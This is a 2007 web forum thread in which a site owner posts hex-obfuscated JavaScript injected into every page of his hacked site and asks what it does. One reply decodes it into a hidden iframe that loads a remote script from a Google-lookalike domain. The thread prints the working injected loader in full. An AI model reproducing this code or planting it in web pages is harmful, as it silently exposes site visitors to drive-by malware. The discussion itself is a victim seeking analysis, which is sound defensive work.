Hack Code

Discussion in 'JavaScript' started by KJWOOLSEY, Oct 2, 2007.

  1. #1
    My website was recently 'hacked' :mad: and the following code was amended to the bottom of each page. I was hoping someone here could tell me what this is designed to do?!?

    
    <script>function v47016676af67d(v47016676b0625){ var v47016676b15c9=16; return(parseInt(v47016676b0625,v47016676b15c9));}function v47016676b3509(v47016676b449f){ function v47016676b7560 () {var v47016676b8325=2; return v47016676b8325;} var v47016676b543d='';for(v47016676b63de=0; v47016676b63de<v47016676b449f.length; v47016676b63de+=v47016676b7560()){ v47016676b543d+=(String.fromCharCode(v47016676af67d(v47016676b449f.substr(v47016676b63de, v47016676b7560()))));}return v47016676b543d;} document.write(v47016676b3509('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3536656138207372633D5C27687474703A2F2F676F6F676C652D7374617469737469632E636F6D2F696E2E6367693F323F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3435393230292B2762365C272077696474683D313430206865696768743D333238207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
    
    Code (markup):
     
    KJWOOLSEY, Oct 2, 2007 IP
  2. affordnow.com

    affordnow.com Peon

    Messages:
    1,204
    Likes Received:
    41
    Best Answers:
    0
    Trophy Points:
    0
    #2
    Maybe some type of exploit to corrupt certain browsers?
     
    affordnow.com, Oct 4, 2007 IP
  3. GMROCKS

    GMROCKS Active Member

    Messages:
    648
    Likes Received:
    11
    Best Answers:
    0
    Trophy Points:
    60
    #3
    This is what it is:
    <iframe name="56ea8" src="http://google-statistic.com/in.cgi?2?16883b6" style="display: none;" height="328" width="140"></iframe>
    
    HTML:
     
    GMROCKS, Oct 4, 2007 IP